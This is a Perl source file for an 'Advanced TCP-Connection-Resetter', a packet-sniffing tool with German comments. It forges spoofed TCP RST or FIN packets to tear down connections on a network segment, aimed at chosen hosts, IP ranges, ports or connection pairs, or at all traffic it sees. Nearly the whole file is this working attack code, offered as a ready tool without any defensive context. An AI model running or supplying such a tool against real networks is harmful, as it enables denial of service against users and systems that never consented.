#!/usr/bin/perl
# Advanced TCP-Connection-Resetter
#
# Autor: stefan@krecher.de
# TheMidget
#
# Lizenz: GPL
#
# Heavily updated by Bastian Ballmann [bytebeater@crazydj.de]
#
# Last Update: 12.05.2002
############################################################################


###[ Loading Modules ]###

use Net::PcapUtils;		     # Libpcap Interface
use NetPacket::Ethernet qw(:strip);  # Decode Ethernet packets	
use NetPacket::IP qw(:strip);	     # Decode IP packets
use NetPacket::TCP;		     # Decode TCP packets
use Net::RawIP;			     # Create packets
use Getopt::Std;		     # Parsing parameter


###[ Globale Variablen ]###

my ($connection,$target,@target,$port, @port, $device, %args);
my $multitarget = 0;
my $multiport = 0;


###[ MAIN PART ]###

# User needs help
if($ARGV[0] eq "--help")
{
    &help();
}


# Starte die GUI Version
if($ARGV[0] eq "--gui")
{
    require "easterrst-gui.pl";
}
else
{
# Parsing parameter
getopts('h:c:p:i:t:srf',\%args);
&start(%args);
}




###[ Subroutines ]###

# Start the process
sub start
{
    my %args = @_;

# Network device festlegen
if(defined $args{'i'})
{
    $device = $args{'i'};
}
else
{
    $device = "eth0";
}

# Achtung Werbung!!! =)
&about();

# Weder target noch connection als Parameter angegeben
unless( (defined $args{'h'}) || (defined $args{'c'}) )
{
	print "      -:[ Resetting all connections]:-\n\n";
}

# Target und connection gleichzeit als Parameter angegeben
if( (defined $args{'h'}) && (defined $args{'c'}) )
{
    &help('toomuch');
}


# Die Connection soll fuer ein oder mehrere Hosts resettet werden
if($args{'h'})
{
    $target = $args{'h'};

# Target list
    if($target =~ /\,/g)
    {
	@target = split(/\,/,$target);
	$multitarget = 1;
    }

# Target range
    elsif($target =~ /\-/)
    {
	my ($start,$stop) = split(/\-/,$target);

	&check_ip($start);
	&check_ip($stop);

# Rechne die IP in eine Dezimalzahl um
	my @start = split(/\./,$start); 
	my @stop = split(/\./,$stop); 

	my $start_dec = ((@start[0]*16777216)+(@start[1]*65536)+(@start[2]*256)+@start[3]);
	my $stop_dec = ((@stop[0]*16777216)+(@stop[1]*65536)+(@stop[2]*256)+@stop[3]);


# Berechne Start / End IP
	while($start_dec < $stop_dec + 1)
	{
		my @bytez;
		my $rem;

# Rechne die Dezimal Zahl wieder in eine IP Adresse um
	    	@bytez[0] = int $start_dec/16777216;
	    	$rem = $start_dec % 16777216;
	    	@bytez[1] = int $rem/65536;
	    	$rem = $rem % 65536;
	    	@bytez[2] = int $rem/256;
	    	$rem = $rem % 256;
	    	@bytez[3] = $rem;
	  	my $ipaddr = join '.', @bytez;
		push @target, $ipaddr;
		$start_dec++;
	}
	
	$multitarget = 1;
    }

# Reset eine einzelne Connection
    else
    {
	&check_ip($target);
	print "      -:[Resetting connection for $target]:-\n\n";
    }

if($multitarget)
{
print "      -:[Resetting Connections for";

	for(@target)
	{
    	   &check_ip($_);
    	   print "  $_";
	}

print "]:-\n\n";
}
}

# Wir sollen nur Packete fuer einen bestimmten Port resetten
if($args{'p'})
{
    $port = $args{'p'};

	# Port List?
	if($port =~ /\,/)
	{
		@port = split(/\,/,$port);
		$multiport = 1;
	}

	# Port Range?
	if($port =~ /\-/)
	{
		my($start,$stop) = split(/\-/,$port);

		for(my $i=$start; $i <= $stop; $i++)
		{
			push @port, $i;
		}

		$multiport = 1;
	}

	if($multiport)
	{
		print "      -:[Ports";

		for(@port)
		{
			print "  $_";
		}

		print "]:-\n\n";
	}

# Reset only one port
	elsif(defined $port)
	{
		print "      -:[Port $port\n\n";
	}
}



# Es soll nur eine bestimmte Connection resettet werden
if($args{'c'})
{
    $connection = $args{'c'};
    @target = split(/\-/,$connection);

    for(@target)
    {
	check_ip($_);
    }

    print "     -:[Resetting Connection $connection]:-\n\n";
}


# Reset via FIN?
if($args{'f'})
{
    print "      -:[Resetting via FIN packet]:-\n\n";
}
else
{
    print "      -:[Resetting via RST packet]:-\n\n";
}


# Status Ausgabe fuer Device
print "     -:[Sniffin TCP traffic on $device]:-\n\n";


# GUI neu zeichnen
if($ARGV[0] eq "--gui")
{
    $result->insert(end," * Started RST deamon\n");
    $top->update();
}


# Sniffen!!! Gesundheit =)
Net::PcapUtils::loop(\&process_pkt,
                     PROMISC => 1, 
                     FILTER => 'tcp', 
                     DEV => $device
                    );

}


# Nur Pakete von oder zum Target resetten
# Keine RST Pakete resetten!
sub check_packet
{
    my $target = shift;
    my $target2 = shift;
    my $port = shift;
    my $ip_obj = shift;
    my $tcp_obj = shift;


# Ist das Packet ein RST Packet?
# Wir resetten kein RST, wir sind ja nicht bloed! =)
if($tcp_obj->{flags} == 4)
{
    return 1;
}

# Sollen nur SYN packets resettet werden?
if(defined $args{'s'})
{
    # Haben wir hier denn ein SYN packet?
    unless($tcp_obj->{flags} == 2)
    {
	return 1;
    }
}

# Soll die Connection fuer einen Port resettet werden und das Packet gehoert nicht
# zu diesem Port??
if($port ne "")
{
    unless( ($tcp_obj->{src_port} == $port) || ($tcp_obj->{dest_port} == $port) )
    {
         return 1;
    }
}


# Falls eine Connection resettet werden soll, checke das Packet
if($connection ne "")
{
    # Gehoert das Packet zu der Connection, die resettet werden soll?
    if( ($ip_obj->{src_ip} eq $target) && ($ip_obj->{dest_ip} eq $target2) )
    {
       &send_rst($target,$ip_obj,$tcp_obj);
    }
    elsif( ($ip_obj->{dest_ip} eq $target) && ($ip_obj->{src_ip} eq $target2) )
    {
        &send_rst($target,$ip_obj,$tcp_obj);
    }
}

# Gehoert das Packet vielleicht zu einem Target?
elsif($target ne "")
{
    if( ($ip_obj->{src_ip} eq $target) || ($ip_obj->{dest_ip} eq $target) )
    {
        &send_rst($target,$ip_obj,$tcp_obj);
    }
}


# Wir sollen alles resetten
else
{
	&send_rst('',$ip_obj,$tcp_obj);
}
}




# Create and send a Reset packet
sub send_rst
{
    my $target = shift;
    my $ip_obj = shift;
    my $tcp_obj = shift;
    my $packet = new Net::RawIP;

# Reset via FIN packet
if($args{'f'})
{
# Create the packet
    $packet->set({
                  ip => {
                          saddr => $ip_obj->{dest_ip},
                          daddr => $ip_obj->{src_ip}
                        },
                  tcp => {
                           source => $tcp_obj->{dest_port},
                           dest => $tcp_obj->{src_port},
                           fin => "1",
                           seq => $tcp_obj->{acknum},
                         }
               });

# Status Ausgabe
	if($port ne "")
	{
	    if($ARGV[0] eq "--gui")
	    {
		$result->insert(end," *    FIN sent $ip_obj->{src_ip}:$tcp_obj->{src_port}  -->  $ip_obj->{dest_ip}:$tcp_obj->{dest_port}\n");
		$top->update();
	    }
	    else
	    {
		print " *    FIN sent $ip_obj->{src_ip}:$tcp_obj->{src_port}  -->  $ip_obj->{dest_ip}:$tcp_obj->{dest_port}\n";
	    }
	}
	else
	{
	    if($ARGV[0] eq "--gui")
	    {
		$result->insert(end," *    FIN sent $ip_obj->{src_ip}  -->  $ip_obj->{dest_ip}\n");
		$top->update();
	    }
	    else
	    {
		print " *    FIN sent $ip_obj->{src_ip}  -->  $ip_obj->{dest_ip}\n";
	    }
	}
}

# Reset via RST packet
else
{
# Create the packet
  $packet->set({
                  ip => {
                          saddr => $ip_obj->{dest_ip},
                          daddr => $ip_obj->{src_ip}
                        },
                  tcp => {
                           source => $tcp_obj->{dest_port},
                           dest => $tcp_obj->{src_port},
                           rst => "1",
                           seq => $tcp_obj->{acknum},
                         }
               });


# Status Ausgabe
	if($port ne "")
	{
	    if($ARGV[0] eq "--gui")
	    {
		$result->insert(end," *    RST sent $ip_obj->{src_ip}:$tcp_obj->{src_port}  -->  $ip_obj->{dest_ip}:$tcp_obj->{dest_port}\n");
		$top->update();
	    }
	    else
	    {
		print " *    RST sent $ip_obj->{src_ip}:$tcp_obj->{src_port}  -->  $ip_obj->{dest_ip}:$tcp_obj->{dest_port}\n";
	    }
	}
	else
	{
	    if($ARGV[0] eq "--gui")
	    {
		$result->insert(end," *    RST sent $ip_obj->{src_ip}  -->  $ip_obj->{dest_ip}\n");
		$top->update();
	    }
	    else
	    {
		print " *    RST sent $ip_obj->{src_ip}  -->  $ip_obj->{dest_ip}\n";
	    }
	}
}

# ...and send it over the wire!
  $packet->send(0, 1);
}





# Funktion "process_pkt($arg, $hdr, $pkt)" wird fr jedes
# eingefangene Paket aufgerufen
# Decoding Packet
sub process_pkt {
  my($arg, $hdr, $pkt) = @_;
  my $ip_obj = NetPacket::IP->decode(eth_strip($pkt));
  my $tcp_obj = NetPacket::TCP->decode($ip_obj->{data});

# GUI neu zeichnen
if($ARGV[0] eq "--gui")
{
    $top->update();
}

# Connection resetten?
if($connection ne "")
{
# Ueberpruefe ob wir den Port resetten sollen
	if($multiport)
	{
		for(@port)
		{
		   &check_packet($target[0], $target[1], $_, $ip_obj, $tcp_obj);
		}
	}
	else
	{
	   &check_packet($target[0], $target[1], '', $ip_obj, $tcp_obj);
	}
}

# Target resetten?
elsif($multitarget == 1)
{
# Ueberpruefe ob wir den Host resetten sollen
    foreach my $target (@target)
    {

# Ueberpruefe ob wir den Port resetten sollen
	if($multiport)
	{
		for(@port)
		{
			&check_packet($target, '', $_, $ip_obj, $tcp_obj);
		}
	}
	else
	{
		&check_packet($target, '', '', $ip_obj, $tcp_obj);
	}

    }
}

# Einen einzelnen Host resetten
else
{
# Ueberpruefe ob wir den Port resetten sollen
	if($multiport)
	{
		for(@port)
		{
		    &check_packet($target, '', $_, $ip_obj, $tcp_obj);
		}
	}
	else
	{
	    &check_packet($target, '', $port, $ip_obj, $tcp_obj);
	}
}
}




# Check if ip address is correct
sub check_ip
{
    my $ip = shift;

    my @ip = split(/\./,$ip);

# Mehr als 4 Byte?
if(scalar(@ip != 4))
{
    die ">>>  Bad IP address $ip!\n\n";
}

# Ist ein Wert groesser als 256?
for(@ip)
{
    if($_ > 256)
    {
	die ">>> Bad IP address $ip!\n\n";
    }
}
}


sub stop
{
    exit(0);
}


# Print Usage
sub help
{
    my $error = shift;

    &about();

if($error eq "toomuch")
{
    print ">>>  Please choose either target or connection!\n\n";
}

    print ">>> Usage: $0 -f -r -s -i <device> -p <port> -t <targets> -c <connection>\n\n";
    print "    -f: Reset connection via FIN packet\n";
    print "    -r: Reset connection via RST packet (default)\n";
    print "    -s: Reset only SYN packets\n";
    print "    <targets>: Comma seperated list possible\n";
    print "    <connection>: E.g 192.168.1.1-192.168.1.2\n\n";
    exit(0);
}


# Print about
sub about
{
# Achtung Werbung!!! =)
system"/usr/bin/setterm -foreground green -background black -default";
system"/usr/bin/clear";
print "\n\n      ---------:[ Advanced TCP-Connection-Resetter\n";
print "      ---:[ Programmed by Stefan Krecher and Bastian Ballmann\n";
print "      " . "-" x 55 . "\n\n";
}
